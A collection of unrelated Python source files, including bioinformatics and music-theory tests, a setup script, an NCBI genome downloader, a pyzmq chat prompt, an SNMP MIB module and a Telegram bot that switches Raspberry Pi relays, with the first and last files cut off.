return equi_conv2d(input, self.weight, self.bias, stride=self.stride,
padding=self.padding, dilation=self.dilation)
def __repr__(self):
s = self.__class__.__name__ + '('
s += '{in_channels}'
s += ', {out_channels}'
s += ', kernel_size={kernel_size}'
s += ', stride={stride}'
s += ', padding={padding}' if self.padding != (0, 0) else ''
s += ', dilation={dilation}' if self.dilation != (1, 1) else ''
s += ', groups={groups}' if self.groups != 1 else ''
s += ', bias=False' if self.bias is None else ''
s += ')'
return s.format(**self.__dict__) |
py | b411205aa93fef697abd86748b1b7c6325ce214c | # This source code is part of the Biotite package and is distributed
# under the 3-Clause BSD License. Please see 'LICENSE.rst' for further
# information.
import numpy as np
import pytest
import biotite.sequence as seq
import biotite.sequence.align as align
K = 3
@pytest.fixture
def kmer_alphabet():
return align.KmerAlphabet(seq.ProteinSequence.alphabet, K)
@pytest.fixture
def spaced_kmer_alphabet():
return align.KmerAlphabet(seq.ProteinSequence.alphabet, K, spacing=[0,1,2])
np.random.seed(0)
N = 10
L = 30
@pytest.mark.parametrize(
"ref_split_kmer_code",
# Test for single instances as input
list(np.random.randint(len(seq.ProteinSequence.alphabet), size=(N, K))) +
# Test for multiple instances as input
list(np.random.randint(len(seq.ProteinSequence.alphabet), size=(N, L, K)))
)
def test_fuse_and_split(kmer_alphabet, ref_split_kmer_code):
"""
Check if :meth:`fuse()` and its reverse counterpart :meth:`split()`
work properly by using them back and forth on random input.
"""
fused = kmer_alphabet.fuse(ref_split_kmer_code)
test_split_kmer_code = kmer_alphabet.split(fused)
assert test_split_kmer_code.tolist() == ref_split_kmer_code.tolist()
np.random.seed(0)
N = 10
@pytest.mark.parametrize(
"split_kmer_code",
np.random.randint(len(seq.ProteinSequence.alphabet), size=(N, K))
)
def test_encode_and_decode(kmer_alphabet, split_kmer_code):
"""
Check if :meth:`encode()` and its reverse counterpart
:meth:`decode()` work properly by using them back and forth on
random input.
"""
alph = seq.ProteinSequence.alphabet
ref_kmer_symbol = alph.decode_multiple(split_kmer_code)
kmer_code = kmer_alphabet.encode(ref_kmer_symbol)
test_kmer_symbol = kmer_alphabet.decode(kmer_code)
assert test_kmer_symbol.tolist() == ref_kmer_symbol.tolist()
def test_create_continuous_kmers(kmer_alphabet):
"""
Test :meth:`create_kmers()` against repetitive use of
:meth:`fuse()`, which rely on two different implementations.
The input sequence code is randomly created.
"""
np.random.seed(0)
LENGTH = 100
seq_code = np.random.randint(
len(seq.ProteinSequence.alphabet), size=LENGTH, dtype=np.uint8
)
ref_kmers = [
kmer_alphabet.fuse(seq_code[i : i + kmer_alphabet.k])
for i in range(len(seq_code) - kmer_alphabet.k + 1)
]
test_kmers = kmer_alphabet.create_kmers(seq_code)
assert test_kmers.tolist() == ref_kmers
N = 50
@pytest.mark.parametrize("seed", range(N))
def test_create_spaced_kmers(kmer_alphabet, spaced_kmer_alphabet, seed):
"""
Test :meth:`create_kmers()` for creating spaced *k-mers*.
Compare results from random sequences to corresponding results from
:meth:`create_kmers()` without spacing, by using a spacing model
that is equivalent to non-spaced *k-mers*.
"""
MIN_LENGTH = 10
MAX_LENGTH = 1000
np.random.seed(seed)
sequence = seq.ProteinSequence()
sequence.code = np.random.randint(
len(sequence.alphabet),
size=np.random.randint(MIN_LENGTH, MAX_LENGTH)
)
ref_kmers = kmer_alphabet.create_kmers(sequence.code)
test_kmers = spaced_kmer_alphabet.create_kmers(sequence.code)
assert len(test_kmers) == len(ref_kmers)
assert test_kmers.tolist() == ref_kmers.tolist()
def test_invalid_spacing():
"""
Check if expected exceptions are raised if an invalid spacing is
given.
"""
alphabet = seq.ProteinSequence.alphabet
with pytest.raises(ValueError):
# Not enough informative positions for given k
align.KmerAlphabet(alphabet, 5, spacing=[0, 1, 3, 4])
with pytest.raises(ValueError):
# Duplicate positions
align.KmerAlphabet(alphabet, 5, spacing=[0, 1, 1, 3, 4])
with pytest.raises(ValueError):
# Negative values
align.KmerAlphabet(alphabet, 5, spacing=[-1, 1, 2, 3, 4]) |
py | b411209e81065be5435837705481f676591b20b7 | import unittest
from music21.converter import parseData as m21ParseData
from romanyh.voicing import solveProgression
from romanyh.voicing import getChordFromPitches
from romanyh.voicing import getKeyFromString
from romanyh.voicing import getPitchFromString
from romanyh.voicing import getLeadingTone
from romanyh.voicing import getVerticalIntervalsFromPitches
from romanyh.voicing import getInterval
from romanyh.voicing import isTriad
from romanyh.voicing import voiceChord
from romanyh.voicing import progressionCost
from romanyh.voicing import chordCost
trivial = """
Composer: Néstor Nápoles López
Title: Changing keys
Time signature: 4/4
m1 b1 C: I b2 I
m2 I b2 I
m3 I
"""
basic = """
Composer: Néstor Nápoles López
Title: Basic
Time signature: 4/4
m1 b1 C: I b3 IV
m2 Cad64 b3 V
m3 I
"""
changingKeys = """
Composer: Néstor Nápoles López
Title: Changing keys
Time signature: 3/4
m1 b1 C: I c: b3 I
m2 C: V c: b3 V
m3 C: I c: b3 I
"""
def cleanupCache():
getChordFromPitches.cache_clear()
getKeyFromString.cache_clear()
getPitchFromString.cache_clear()
getLeadingTone.cache_clear()
getVerticalIntervalsFromPitches.cache_clear()
getInterval.cache_clear()
isTriad.cache_clear()
voiceChord.cache_clear()
progressionCost.cache_clear()
chordCost.cache_clear()
def getCaches():
return (
("getChordFromPitches", getChordFromPitches.cache_info()),
("getKeyFromString", getKeyFromString.cache_info()),
("getPitchFromString", getPitchFromString.cache_info()),
("getLeadingTone", getLeadingTone.cache_info()),
(
"getVerticalIntervalsFromPitches",
getVerticalIntervalsFromPitches.cache_info(),
),
("getInterval", getInterval.cache_info()),
("isTriad", isTriad.cache_info()),
("voiceChord", voiceChord.cache_info()),
("progressionCost", progressionCost.cache_info()),
("chordCost", chordCost.cache_info()),
)
def romanNumeralsToPitches(romanNumerals):
pitchTuples = []
for rn in romanNumerals:
pitchTuples.append(tuple(p.nameWithOctave for p in rn.pitches))
return pitchTuples
class TestTrivialExample(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.testFile = trivial
cls.voicingsLengthGT = (43, 43, 43, 43, 43)
cls.cachesGT = (
{"hits": 3698, "misses": 46}, # getChordFromPitches
{"hits": 1849, "misses": 1}, # getKeyFromString
{"hits": 449, "misses": 10}, # getPitchFromString
{"hits": 1848, "misses": 1}, # getLeadingTone
{"hits": 3655, "misses": 43}, # getVerticalIntervalsFromPitches
{"hits": 7799, "misses": 71}, # getInterval
{"hits": 42, "misses": 2}, # isTriad
{"hits": 4, "misses": 1}, # voiceChord
{"hits": 5547, "misses": 1849}, # progressionCost
{"hits": 172, "misses": 43}, # chordCost
)
def setUp(self):
self.s = m21ParseData(self.testFile, format="romantext")
self.romanNumerals = [
rn for rn in self.s.flat.getElementsByClass("RomanNumeral")
]
def test_voicing_length(self):
pitchTuples = romanNumeralsToPitches(self.romanNumerals)
for i, pitches in enumerate(pitchTuples):
voicings = voiceChord(pitches, allowedUnisons=1)
voicingLengthGT = self.voicingsLengthGT[i]
with self.subTest(msg=str(pitches)):
self.assertEqual(len(voicings), voicingLengthGT)
def test_cache_info(self):
solveProgression(self.romanNumerals, allowedUnisons=1)
caches = getCaches()
for i, cache in enumerate(caches):
cacheName, cacheInfo = cache
cacheGT = self.cachesGT[i]
with self.subTest(msg=cacheName):
self.assertEqual(cacheInfo.hits, cacheGT["hits"])
self.assertEqual(cacheInfo.misses, cacheGT["misses"])
def tearDown(self):
cleanupCache()
class TestBasicExample(TestTrivialExample):
@classmethod
def setUpClass(cls):
cls.testFile = basic
cls.voicingsLengthGT = (43, 46, 28, 46, 43)
cls.cachesGT = (
{"hits": 13064, "misses": 173}, # getChordFromPitches
{"hits": 6532, "misses": 1}, # getKeyFromString
{"hits": 1780, "misses": 24}, # getPitchFromString
{"hits": 6531, "misses": 1}, # getLeadingTone
{"hits": 12901, "misses": 163}, # getVerticalIntervalsFromPitches
{"hits": 27617, "misses": 266}, # getInterval
{"hits": 161, "misses": 6}, # isTriad
{"hits": 1, "misses": 4}, # voiceChord
{"hits": 0, "misses": 6532}, # progressionCost
{"hits": 43, "misses": 163}, # chordCost
)
class TestChangingKeysExample(TestTrivialExample):
@classmethod
def setUpClass(cls):
cls.testFile = changingKeys
cls.voicingsLengthGT = (43, 43, 46, 46, 43, 43)
cls.cachesGT = (
{"hits": 15842, "misses": 95}, # getChordFromPitches
{"hits": 7921, "misses": 2}, # getKeyFromString
{"hits": 1033, "misses": 17}, # getPitchFromString
{"hits": 7919, "misses": 2}, # getLeadingTone
{"hits": 15753, "misses": 89}, # getVerticalIntervalsFromPitches
{"hits": 32469, "misses": 178}, # getInterval
{"hits": 87, "misses": 4}, # isTriad
{"hits": 4, "misses": 2}, # voiceChord
{"hits": 1849, "misses": 7921}, # progressionCost
{"hits": 175, "misses": 89}, # chordCost
)
if __name__ == "__main__":
unittest.main()
|
py | b4112158eb43a79e8bcf4d01e4f5273daf9d3992 | from typing import Iterable
import matplotlib.axis
import matplotlib.pyplot as plt
import pandas as pd
import seaborn as sns
def rename_teachers(data: pd.DataFrame):
dic = {
"leitner": "Leitner",
"forward": "Conservative\nsampling",
"threshold": "Myopic",
}
for k, v in dic.items():
data["teacher"] = data["teacher"].replace([k], v)
return data
def boxplot_n_learnt(data: pd.DataFrame,
ax: matplotlib.axes._axes.Axes = None,
ylim: Iterable = None,
x_label: str = "Teacher",
y_label: str = "Learned",
dot_size: int = 3,
dot_alpha: float = 0.7):
if ax is None:
fig, ax = plt.subplots()
data = rename_teachers(data)
data = data.rename(columns={
"n_learnt": y_label,
"teacher": x_label
})
order = ["Leitner", "Myopic", "Conservative\nsampling"]
colors = ["C0", "C1", "C2"]
sns.boxplot(x=x_label, y=y_label, data=data, ax=ax,
palette=colors, order=order,
showfliers=False)
sns.stripplot(x=x_label, y=y_label, data=data, s=dot_size,
color="0.25", alpha=dot_alpha, ax=ax, order=order)
ax.set_xticklabels(ax.get_xmajorticklabels(), fontsize=13)
if ylim is not None:
ax.set_ylim(*ylim)
ax.set_xlabel("")
|
py | b4112169b0d6ce81a8407be4c68918127d15f038 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from setuptools import setup
import re
import os
import sys
def get_version(package):
"""
Return package version as listed in `__version__` in `init.py`.
"""
init_py = open(os.path.join(package, '__init__.py')).read()
return re.search("__version__ = ['\"]([^'\"]+)['\"]", init_py).group(1)
def get_packages(package):
"""
Return root package and all sub-packages.
"""
return [dirpath
for dirpath, dirnames, filenames in os.walk(package)
if os.path.exists(os.path.join(dirpath, '__init__.py'))]
def get_package_data(package):
"""
Return all files under the root package, that are not in a
package themselves.
"""
walk = [(dirpath.replace(package + os.sep, '', 1), filenames)
for dirpath, dirnames, filenames in os.walk(package)
if not os.path.exists(os.path.join(dirpath, '__init__.py'))]
filepaths = []
for base, filenames in walk:
filepaths.extend([os.path.join(base, filename)
for filename in filenames])
return {package: filepaths}
version = get_version('openapi_codec')
if sys.argv[-1] == 'publish':
os.system("python setup.py sdist upload")
print("You probably want to also tag the version now:")
print(" git tag -a %s -m 'version %s'" % (version, version))
print(" git push --tags")
sys.exit()
setup(
name='openapi-codec',
version=version,
url='http://github.com/core-api/python-openapi-codec/',
license='BSD',
description='An OpenAPI codec for Core API.',
author='Tom Christie',
author_email='[email protected]',
packages=get_packages('openapi_codec'),
package_data=get_package_data('openapi_codec'),
install_requires=['coreapi>=2.2.0'],
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
],
entry_points={
'coreapi.codecs': [
'openapi=openapi_codec:OpenAPICodec'
]
}
)
|
py | b41121a9c65cde3d49b0b86e84f0fd12c14d283b | #!/usr/bin/env python3
"""
script for downloading genomes from NCBI
"""
# python modules
import os
import sys
import argparse
import pandas as pd
from tqdm import tqdm
from subprocess import Popen
from glob import glob as glob
from multiprocessing import Pool
from subprocess import Popen, PIPE
def calcMD5(path, md5):
"""
calc MD5 based on path
"""
# check that file exists
if os.path.exists(path) is False:
yield False
else:
command = [md5, path]
p = Popen(command, stdout = PIPE)
for line in p.communicate()[0].splitlines():
line = line.decode('ascii').strip().split()
# check if `md5` output
if line[0] == 'MD5':
yield line[-1]
# else assume md5sum output
else:
yield line[0]
p.wait()
yield False
def md5check(f, ftp, md5, md5p, exclude):
"""
* comfirm that downloaded files match md5 checksum on server
* if md5 is False, only check path for the download
"""
files = glob(f)
# if no md5 file is specified: download files if path does not exist
if md5 is False:
if len(files) == 0:
return False
print('## already downloaded:', f)
return True
# get md5s from server
## path to md5 file on ftp server
md5 = '%s/%s' % (ftp.rsplit('/', 1)[0], md5)
## read md5 table from server
try:
md5 = pd.read_csv(md5, delim_whitespace = True, names = ['ftp md5', 'file'])
except:
return False
## filter for md5 files that match file type
t = f.split('*')[1]
md5 = md5[md5['file'].str.contains(t)]
## remove preceding characters from file paths
md5['file'] = [i.replace('./', '') for i in md5['file']]
## exclude md5s for sub directories
md5 = md5[~md5['file'].str.contains('/')]
## exclude files
md5 = md5[~md5['file'].str.contains(exclude.replace('*', ''))]
# get local md5s
md5['local md5'] = [[j for j in calcMD5(i, md5p)][0] for i in md5['file']]
# return false if md5s do not match
for i, File in md5.iterrows():
if File['ftp md5'] != File['local md5']:
try:
os.remove(File['file'])
return False
except:
return False
print('## already downloaded:', f)
return True
def wget(ftp, f = False, exclude = False, name = False,
md5 = False, md5p = 'md5sum', tries = 10):
"""
download files with wget
"""
# file name
if f is False:
f = ftp.rsplit('/', 1)[-1]
# downloaded file if it does not already exist
# check md5s on server (optional)
t = 0
while md5check(f, ftp, md5, md5p, exclude) is not True:
t += 1
if name is not False:
print('# downloading:', name, f)
if exclude is False:
command = 'wget -q --random-wait %s' % (ftp)
else:
command = 'wget -q --random-wait -R %s %s' % (exclude, ftp)
p = Popen(command, shell = True)
p.communicate()
if t >= tries:
print('not downloaded:', name, f)
return [f, False]
return [f, True]
def check(line, queries):
"""
check that at least one of
queries is in list, l
"""
line = line.strip()
spLine = line.replace('.', ' ').split()
matches = set(spLine).intersection(queries)
if len(matches) > 0:
return matches, line.split('\t')
return matches, False
def entrez(db, acc):
"""
search entrez using specified database
and accession
"""
c1 = ['esearch', '-db', db, '-query', acc]
c2 = ['efetch', '-db', 'BioSample', '-format', 'docsum']
p1 = Popen(c1, stdout = PIPE, stderr = PIPE)
p2 = Popen(c2, stdin = p1.stdout, stdout = PIPE, stderr = PIPE)
return p2.communicate()
def searchAccession(acc):
"""
attempt to use NCBI Entrez to get
BioSample ID
"""
# try genbank file
# genome database
out, error = entrez('genome', acc)
for line in out.splitlines():
line = line.decode('ascii').strip()
if 'Assembly_Accession' in line or 'BioSample' in line:
newAcc = line.split('>')[1].split('<')[0].split('.')[0].split(',')[0]
if len(newAcc) > 0:
return (True, acc, newAcc)
# nucleotide database
out, error = entrez('nucleotide', acc)
for line in out.splitlines():
line = line.decode('ascii').strip()
if 'Assembly_Accession' in line or 'BioSample' in line:
newAcc = line.split('>')[1].split('<')[0].split('.')[0].split(',')[0]
if len(newAcc) > 0:
return (True, acc, newAcc)
# assembly database
out, error = entrez('assembly', acc)
for line in out.splitlines():
line = line.decode('ascii').strip()
if 'Assembly_Accession' in line or 'BioSample' in line:
newAcc = line.split('>')[1].split('<')[0].split('.')[0].split(',')[0]
if len(newAcc) > 0:
return (True, acc, newAcc)
for error in error.splitlines():
error = error.decode('ascii').strip()
if '500 Can' in error:
return (False, acc, 'no network')
return (False, acc, 'efetch failed')
def getFTPs(accessions, ftp, search, exclude, convert = False, threads = 1, attempt = 1,
max_attempts = 2):
"""
download genome info from NCBI
"""
info = wget(ftp)[0]
allMatches = []
for genome in open(info, encoding = 'utf8'):
genome = str(genome)
matches, genomeInfo = check(genome, accessions)
if genomeInfo is not False:
f = genomeInfo[0] + search
Gftp = genomeInfo[19]
Gftp = Gftp + '/' + search
allMatches.extend(matches)
yield [Gftp, f, exclude, matches]
# print accessions that could not be matched
# and whether or not they could be converted (optional)
newAccs = []
missing = accessions.difference(set(allMatches))
if convert is True:
pool = Pool(threads)
pool = pool.imap_unordered(searchAccession, missing)
for newAcc in tqdm(pool, total = len(missing)):
status, accession, newAcc = newAcc
if status is True:
newAccs.append(newAcc)
print('not found:', accession, '->', newAcc)
else:
for accession in missing:
print('not found:', accession)
# re-try after converting accessions (optional)
if len(newAccs) > 0 and attempt <= max_attempts:
print('convert accession attempt', attempt)
attempt += 1
for hit in getFTPs(set(newAccs), ftp, search, exclude, convert,
threads = 1, attempt = attempt):
yield hit
def wgetGenome(pars, md5 = 'md5checksums.txt'):
"""
"""
ftp, f, exclude, matches, md5p = pars
name = ';'.join(list(matches))
return wget(ftp, f, exclude, name, md5 = md5, md5p = md5p)
def download(args):
"""
download genomes from NCBI
"""
accessions, infoFTP = set(args['g']), args['i']
search, exclude, md5p = args['s'], args['e'], args['m']
FTPs = getFTPs(accessions, infoFTP, search, exclude, threads = args['t'],
convert = args['convert'])
FTPs = [ftp + [md5p] for ftp in FTPs]
if args['test'] is True:
for genome in FTPs:
print('found:', ';'.join(genome[-1]), genome[0])
return FTPs
pool = Pool(args['t'])
pool = pool.imap_unordered(wgetGenome, FTPs)
files = []
for f in tqdm(pool, total = len(accessions)):
files.append(f)
return files
if __name__ == '__main__':
ftp = 'ftp://ftp.ncbi.nih.gov/genomes/genbank/assembly_summary_genbank.txt'
parser = argparse.ArgumentParser(description='# download genomes from NCBI')
parser.add_argument(\
'-g', nargs = '*', action = 'store',
required = True, help = 'list of genome accession numbers (- for stdin)')
parser.add_argument(\
'-s', default = '*.fna.gz',
required = False, help = 'search term for download (default = "*.fna.gz")')
parser.add_argument(\
'-e', default = '*from_genomic*',
required = False,
help = 'search exclusion term, or False (default = "*from_genomic*")')
parser.add_argument(\
'-i', default = ftp,
required = False, help = 'genome info FTP (default: %s)' % (ftp))
parser.add_argument(\
'-m', default = 'md5sum', type = str,
required = False, help = 'md5 program (default = md5sum, md5 on Mac)')
parser.add_argument(\
'-t', default = 3, type = int,
required = False, help = 'threads (default = 3)')
parser.add_argument(\
'--convert', action = 'store_true', required = False,
help = 'convert missing accessions using Entrez Direct (slow; requires `esearch` and `efetch`)')
parser.add_argument(\
'--test', action = 'store_true', required = False,
help = 'look for genomes, but do not download them')
args = vars(parser.parse_args())
if args['e'] == 'False' or args['e'] == 'FALSE':
args['e'] = False
if args['g'][0] == '-':
args['g'] = [i.strip() for i in sys.stdin]
print('# downloading genome info:', args['i'])
download(args)
|
py | b4112283105d2e160303cfd03a07fd64cec34e4e | """The prompt part of a simply two process chat app."""
#
# Copyright (c) 2010 Andrew Gwozdziewycz
#
# This file is part of pyzmq.
#
# pyzmq is free software; you can redistribute it and/or modify it under
# the terms of the Lesser GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# pyzmq is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# Lesser GNU General Public License for more details.
#
# You should have received a copy of the Lesser GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import zmq
try:
raw_input # Python 2
except NameError:
raw_input = input # Python 3
def main(addr, account):
ctx = zmq.Context()
socket = ctx.socket(zmq.PUB)
socket.bind(addr)
while True:
message = raw_input("%s> " % account)
socket.send_multipart((account, message))
if __name__ == '__main__':
import sys
if len(sys.argv) != 3:
print("usage: prompt.py <address> <username>")
raise SystemExit
main(sys.argv[1], sys.argv[2])
|
py | b411239d8424def743c4f97001f58516e8f61f99 | #
# PySNMP MIB module NETSCREEN-ZONE-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/NETSCREEN-ZONE-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 20:11:00 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ValueRangeConstraint, ValueSizeConstraint, SingleValueConstraint, ConstraintsIntersection, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "ValueRangeConstraint", "ValueSizeConstraint", "SingleValueConstraint", "ConstraintsIntersection", "ConstraintsUnion")
netscreenZone, = mibBuilder.importSymbols("NETSCREEN-SMI", "netscreenZone")
ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ModuleCompliance", "NotificationGroup")
ModuleIdentity, NotificationType, MibScalar, MibTable, MibTableRow, MibTableColumn, Integer32, Gauge32, MibIdentifier, iso, IpAddress, Counter64, Unsigned32, Counter32, ObjectIdentity, TimeTicks, Bits = mibBuilder.importSymbols("SNMPv2-SMI", "ModuleIdentity", "NotificationType", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Integer32", "Gauge32", "MibIdentifier", "iso", "IpAddress", "Counter64", "Unsigned32", "Counter32", "ObjectIdentity", "TimeTicks", "Bits")
TextualConvention, DisplayString = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString")
netscreenZoneMibModule = ModuleIdentity((1, 3, 6, 1, 4, 1, 3224, 8, 0))
netscreenZoneMibModule.setRevisions(('2004-05-03 00:00', '2004-03-03 00:00', '2003-11-13 00:00', '2001-09-28 00:00', '2000-05-08 00:00',))
if mibBuilder.loadTexts: netscreenZoneMibModule.setLastUpdated('200405032022Z')
if mibBuilder.loadTexts: netscreenZoneMibModule.setOrganization('Juniper Networks, Inc.')
nsZoneCfg = MibIdentifier((1, 3, 6, 1, 4, 1, 3224, 8, 1))
nsZoneCfgTable = MibTable((1, 3, 6, 1, 4, 1, 3224, 8, 1, 1), )
if mibBuilder.loadTexts: nsZoneCfgTable.setStatus('current')
nsZoneCfgEntry = MibTableRow((1, 3, 6, 1, 4, 1, 3224, 8, 1, 1, 1), ).setIndexNames((0, "NETSCREEN-ZONE-MIB", "nsZoneCfgId"))
if mibBuilder.loadTexts: nsZoneCfgEntry.setStatus('current')
nsZoneCfgId = MibTableColumn((1, 3, 6, 1, 4, 1, 3224, 8, 1, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: nsZoneCfgId.setStatus('current')
nsZoneCfgName = MibTableColumn((1, 3, 6, 1, 4, 1, 3224, 8, 1, 1, 1, 2), DisplayString().subtype(subtypeSpec=ValueSizeConstraint(0, 32))).setMaxAccess("readonly")
if mibBuilder.loadTexts: nsZoneCfgName.setStatus('current')
nsZoneCfgType = MibTableColumn((1, 3, 6, 1, 4, 1, 3224, 8, 1, 1, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1, 2, 3, 4))).clone(namedValues=NamedValues(("regular", 0), ("layer2", 1), ("tunnel", 2), ("null", 3), ("func", 4)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: nsZoneCfgType.setStatus('current')
nsZoneCfgVsys = MibTableColumn((1, 3, 6, 1, 4, 1, 3224, 8, 1, 1, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: nsZoneCfgVsys.setStatus('current')
mibBuilder.exportSymbols("NETSCREEN-ZONE-MIB", nsZoneCfgVsys=nsZoneCfgVsys, nsZoneCfgName=nsZoneCfgName, nsZoneCfgTable=nsZoneCfgTable, nsZoneCfgEntry=nsZoneCfgEntry, PYSNMP_MODULE_ID=netscreenZoneMibModule, nsZoneCfgType=nsZoneCfgType, nsZoneCfg=nsZoneCfg, netscreenZoneMibModule=netscreenZoneMibModule, nsZoneCfgId=nsZoneCfgId)
|
py | b411242121fd86697cce125eff34296909f3f55f | #!/usr/bin/env python
# The Expat License
#
# Copyright (c) 2017, Shlomi Fish
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import sys
if sys.version_info > (3,):
long = int
xrange = range
MOD = int(os.environ["MOD"])
mods = []
with open('mod_groups.txt') as f:
for line in f:
nums = [long(i) for i in line.rstrip('\n').split(' ')]
count = nums.pop(0)
for n in nums:
for i in xrange(count):
mods.append(n)
my_len = len(mods)
ret = 0
def rec(depth, m, stack):
if depth == my_len:
if m == 0:
global ret
print(stack)
ret += 1
else:
rec(depth+1, m, stack)
rec(depth+1, (m+mods[depth]) % MOD, stack + [mods[depth]])
return
rec(0, 0, [])
ret -= 1
print("Num = %d" % (ret))
|
py | b411244c9aa30b0ce3886ceeef22c9e1738809b1 | #!/usr/bin/env python
import os
import sys
if __name__ == '__main__':
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'CollegeERP.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
|
py | b41124d9e3895c8038635865fa95e18d2ed9a6c9 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Telegram module, core of a bot
"""
# ToDo: add music player
# ToDo: add RPi controls & status
import telebot
import helpers
import ui
import gpio
from threading import Thread
from time import sleep
bot = telebot.TeleBot(helpers.token)
err = '\xf0\x9f\x98\xa3'
ok = '\xf0\x9f\x98\x89'
verbose = True
watchdog = False
def convert(state):
if state:
return 'Enabled'
return 'Disabled'
def send_message(msg):
bot.send_message(helpers.admin_uid, msg, parse_mode='HTML')
def _watchdog():
global watchdog
while watchdog:
if helpers.is_pc_up():
send_message('Hey! PC now is Up and ready for use!\n\nWatchdog now is disabled {}'.format(ok))
break
sleep(1)
watchdog = False
@bot.message_handler(commands=['menu', 'start', 'show', 'm'])
def _(msg):
if msg.chat.id != helpers.admin_uid: return
helpers.log('message_handler', 'Call menu from {}'.format(msg.chat.id))
bot.reply_to(msg, 'Welcome <3', reply_markup=ui.show_keyboard())
@bot.message_handler(commands=['hide'])
def _(msg):
if msg.chat.id != helpers.admin_uid: return
bot.reply_to(msg, ok, reply_markup=ui.hide_keyboard())
@bot.message_handler(content_types=['text'])
def _(msg):
if msg.chat.id != helpers.admin_uid: return
global verbose, watchdog
if msg.text == 'Status':
bot.reply_to(msg,
ui.status.format(
convert(gpio.get_state(gpio.relay_pin1)),
convert(gpio.get_state(gpio.relay_pin2)),
convert(gpio.get_state(gpio.relay_pin3)),
convert(gpio.get_state(gpio.relay_pin4)),
convert(helpers.is_pc_up()),
convert(verbose),
convert(watchdog)
),
parse_mode='HTML')
return
if msg.text == 'Turn PC':
if helpers.is_pc_up():
if not (gpio.get_state(gpio.relay_pin1) and
gpio.get_state(gpio.relay_pin2) and
gpio.get_state(gpio.relay_pin3)):
bot.reply_to(msg, 'Relays already off')
return
gpio.hold_off(gpio.relay_pin1)
gpio.hold_off(gpio.relay_pin2)
gpio.hold_off(gpio.relay_pin3)
gpio.hold_off(gpio.relay_pin4)
bot.reply_to(msg, 'Turning off relays')
else:
bot.reply_to(msg, 'Turning on PC')
gpio.hold_on(gpio.relay_pin1)
sleep(0.3)
gpio.hold_on(gpio.relay_pin2)
sleep(0.3)
gpio.hold_on(gpio.relay_pin3)
sleep(1)
gpio.push(gpio.pc_pin)
return
if msg.text == 'Turn light':
if gpio.get_state(gpio.relay_pin4):
gpio.hold_off(gpio.relay_pin4)
else:
gpio.hold_on(gpio.relay_pin4)
bot.reply_to(msg, 'Light now is <i>{}</i>'.format(convert(gpio.get_state(gpio.relay_pin4))), parse_mode='HTML')
return
if msg.text == 'Verbose':
if not verbose:
verbose = True
else:
verbose = False
bot.reply_to(msg, 'Verbose mode: <i>{}</i>'.format(convert(verbose)), parse_mode='HTML')
return
if msg.text == 'Watchdog':
if helpers.is_pc_up():
bot.reply_to(msg, 'Seems what PC already On.. {}'.format('\xf0\x9f\x98\xb3'))
return
if not watchdog:
watchdog = True
# Sorry me God for that..
Thread(target=_watchdog, args=()).start()
else:
watchdog = False
bot.reply_to(msg, 'Watchdog mode: <i>{}</i>'.format(convert(watchdog)), parse_mode='HTML')
helpers.log('message_handler', u'Receive message from {} | Text: {}'.format(msg.chat.id, msg.text))
def Start():
helpers.log('Start()', 'Run Start() function at core.telegram')
try:
bot.polling(True)
except Exception as ex:
helpers.log('Start()', 'Crash Start() function in core.telegram ({})\n\n{}'.format(__file__, ex), True)
|
py | b4112514730212a12966bc407ccb08184e88807e | from random import randint
from typing import Union
import numpy as np
# 2021-01-01T00:00:00+00:00
first_timestamp = 1609459080000
open_price = randint(40, 100)
close_price = randint(open_price, 110) if randint(0, 1) else randint(
30, open_price)
max_price = max(open_price, close_price)
high_price = max_price if randint(0, 1) else randint(max_price, max_price + 10)
min_price = min(open_price, close_price)
